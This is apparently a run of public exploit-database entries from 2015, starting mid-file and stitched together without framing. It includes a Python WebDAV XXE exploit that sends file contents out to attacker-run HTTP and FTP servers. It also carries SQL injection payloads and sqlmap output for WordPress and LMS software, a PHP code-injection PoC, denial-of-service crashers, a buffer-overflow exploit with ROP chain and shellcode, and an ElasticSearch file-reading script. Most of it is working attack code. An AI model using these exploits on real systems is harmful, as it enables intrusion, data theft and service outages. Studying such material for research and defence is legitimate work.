class http_handler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, ip, fport,*args):
self.ip = ip
self.fport = fport
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self):
if "inb2" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">')
if "oob" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY % send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport})
def log_message(self, format, *args): # silent HTTP server
return
def serve(httpd):
while True:
httpd.handle_request()
handler = lambda *args: http_handler(self.ip, self.fport, *args)
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler)
self.proc = Process(target = serve, args = (httpd,))
self.proc.start()
def stop(self):
self.proc.terminate()
class FTP_XXE():
def __init__(self, port):
self.port = port
def run(self):
class ftp_handler():
def __init__(self, port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind(('0.0.0.0', port))
self.server.listen(5)
def serve(self, d):
inputs = [self.server]
while True:
readable, writable, exceptional = select.select(inputs, [], [])
for s in readable:
if s is self.server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
connection.send("220 xxe-ftp-server\n")
else:
data = s.recv(1024)
if not data:
inputs.remove(s)
continue
if "USER" in data:
s.send("331 password please - version check\n")
else:
s.send("230 more data please!\n")
if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]):
d['loot'] += data
self.d = Manager().dict()
self.d['loot'] = ''
ftpd = ftp_handler(self.port)
self.proc = Process(target = ftpd.serve, args=(self.d,))
self.proc.start()
def stop(self):
self.proc.terminate()
def clean_buf(self):
self.d['loot'] = ''
def get_loot(self):
loot = self.d['loot']
# clean data
loot = loot.replace('\r\nRETR ','/')
loot = loot.replace('\r\nCWD ','/')
loot = loot.replace('CWD ','',1)
loot = loot.replace('RETR ','',1)
return loot
def exploit(url, technique, creds = 'anonymous:anonymous'):
global buffer_with_loot, rand_attr
requests = {
'inb1' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'inb2' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'oob' : {
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
}
}
def request(url, verb, data, creds, timeout):
req = Request(url, data)
req.add_header('User-Agent', script_name)
req.add_header('Content-Type', 'application/xml')
req.add_header('Authorization', 'Basic ' + base64.b64encode(creds))
req.get_method = lambda: verb
#req.set_proxy('127.0.0.1:8081','http') ### For debug
resp = None
try:
resp = urlopen(req, timeout = timeout).read()
except Exception, e:
pass
return resp
while 1:
cmdline = raw_input('\033[33menter command> \033[0m')
cmdline = re.sub('\s+', ' ', cmdline)
cmd = cmdline.split(' ')[0]
arg = cmdline.split(' ')[-1]
if cmd not in ['help', 'get', 'show', 'store', 'exit']:
print '\n\033[36mno such command, use help for command list \033[0m\n'
continue
if cmd == 'exit':
break
if cmd == 'help':
print '\033[36m' + help_interpreter + '\033[0m'
continue
if cmd == 'show':
print '\n\033[36m' + buffer_with_loot + '\033[0m'
continue
if cmd == 'store':
with open(arg,'w') as outf:
outf.write(buffer_with_loot)
print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n'
continue
if cmd == 'get':
if arg.startswith('.'):
arg = '/proc/self/cwd' + arg[1:]
arg = 'file://' + arg
rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content
if technique == 'inb1':
request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb1']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text
except:
buffer_with_loot = ''
if technique == 'inb2':
request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb2']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','')
except:
buffer_with_loot = ''
if technique == 'oob':
request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPFIND', request1, creds, timeout = 8)
buffer_with_loot = ftp_server.get_loot()
ftp_server.clean_buf()
len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('')
print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_
if not len_:
print '\033[36m' + failure_descr + '\033[0m'
continue
def parse_options():
global url, tech, ip, creds, hport, fport
parser = OptionParser(usage = usage)
parser.add_option('--url', dest = url, help = 'url parameter')
parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob')
parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous')
parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access')
parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998')
parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999')
(options, args) = parser.parse_args()
if not options.url or not options.tech:
print 'you must specify url and tech parameters'
sys.exit(2)
if options.tech not in ['inb1', 'inb2', 'oob']:
print 'invalid tech parameter'
sys.exit(2)
if options.tech != 'inb1' and not options.ip:
print 'you must specify ip parameter'
sys.exit(2)
url = options.url
tech = options.tech
ip = options.ip
creds = options.creds if options.creds else 'anonymous:anonymous'
hport = options.hport if options.hport else 9998
fport = options.fport if options.fport else 9999
parse_options()
if tech != 'inb1':
http_server = HTTP_XXE(ip, hport, fport)
http_server.run()
if tech == 'oob':
ftp_server = FTP_XXE(fport)
ftp_server.run()
exploit(url, tech, creds)
if tech != 'inb1':
http_server.stop()
if tech == 'oob':
ftp_server.stop()
# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated SQLi [CWE-89]
-------------------------------
* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++
Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
# Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps
1. Description
Remote Code Execution via email field.
2. Proof of Concept
POST Request
sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=
When the admin user checks the subscibers list, the php code is executed.
3. Solution
Fixed in version 1.2
/*
* Openlitespeed 1.3.9 Use After Free denial of service exploit.
*
* This exploit triggers a denial of service condition within the Openlitespeed web
* server. This is achieved by sending a tampered request contain a large number (91)
* of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
* class is triggered with a freed pointer, resulting in a reference to an invalid
* memory location and thus a segmentation fault.
*
* UAF Request:
* GET / HTTP/1.0
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
* a: a
*
* The above request should be placed into a file name 'uafcrash' prior to running this
* exploit code.
*
* Date: 24/03/2015
* Author: Denis Andzakovic - Security-Assessment.com
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
extern int errno;
int main(int argc, char ** argv){
FILE * fp;
size_t len = 0;
char * line;
if((fp = fopen("uafcrash", "r")) == NULL){
fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
return 1;
}
char * host = "127.0.0.1";
int port = 8088;
int count = 0;
int sock;
struct sockaddr_in serv_addr;
while(1){
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
fprintf(stderr, "[!] Error: Could not create socket \n");
return 1;
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
inet_pton(AF_INET, host, &serv_addr.sin_addr);
if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
close(sock);
return 1;
}
while ((getline(&line, &len, fp)) != -1){
write(sock, line, strlen(line));
}
close(sock);
rewind(fp);
count++;
}
return 42;
}
// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
#include <sys/io.h>
#define FIFO 0x3f5
int main() {
int i;
iopl(3);
outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
// Source: http://www.binvul.com/viewthread.php?tid=508
// Source: https://twitter.com/NTarakanov/status/598370525132423168
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")
int main(int argc, CHAR* argv[]) {
typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
NT_OPEN_FILE NtOpenFileStruct;
PVOID Info;
HMODULE hModule = LoadLibrary(("ntdll.dll"));
NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
if(NtOpenFileStruct == NULL) {
exit(-1);
}
UNICODE_STRING filename;
RtlInitUnicodeString(&filename, L"\\Device\\CNG");
OBJECT_ATTRIBUTES obja;
obja.Attributes = 0x40;
obja.ObjectName = &filename;
obja.Length = 0x18;
obja.RootDirectory = NULL;
obja.SecurityDescriptor = NULL;
obja.SecurityQualityOfService = NULL;
IO_STATUS_BLOCK iostatusblock;
HANDLE hCNG = NULL;
NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
if(NT_SUCCESS(stat)) {
printf("File successfully opened.\n");
}
else {
printf("File could not be opened.\n");
return -1;
}
DWORD dwBuffer = 0;
DWORD dwCnt = 0;
BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
if (FALSE == bRet)
{
printf("[*]Send IOCTL fail!\n");
printf("[*]Error Code:%d\n", GetLastError());
}
else
{
printf("[*]0x%08x\n", dwBuffer);
}
CloseHandle(hCNG);
getchar();
return 0;
}
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]
# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]
# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT
# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET
egg = 'w00t'.encode()
# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'
identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode
sploit = b"\r\n".join([identifier, host, port, name, password, local])
try:
print('[*] Creating exploit file...')
f = open('sploit.bps', 'wb')
f.write(sploit)
f.close()
print('[*] sploit.bps file successfully created!')
except:
print('[!] Error while creating exploit file!')
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details.
[+] Proof of Concept (PoC)
The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory.
[!] PoC Payload
----------------------------
a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";}
----------------------------
[!] PoC Request
----------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1
Host: localhost
Cookie: docebo_session=91853e7eca413578de70304f94a43fe1
Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796
Content-Length: 1453
[...]
-----------------------------1657367614367103261183989796
Content-Disposition: form-data; name="message[recipients]"
a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D
[...]
--------------------------
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
import socket, sys
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
"Host: %s\n\n" % (plugin, fpath, host))
file = s.recv(2048)
print " [*] Trying to retrieve %s:" % fpath
if ("HTTP/1.0 200 OK" in file):
print "\n%s" % file
else:
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/%s/ HTTP/1.0\n"
"Host: %s\n\n" % (plugin, host))
file = s.recv(16)
print "[*] Trying to find plugin %s:" % plugin
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to %s: %s" % (host, e)
sys.exit()
# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
for plugin in pluginList:
pfind(plugin)
Document Title:
===============
Wireless Photo Transfer v3.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1492
Release Date:
=============
2015-05-12
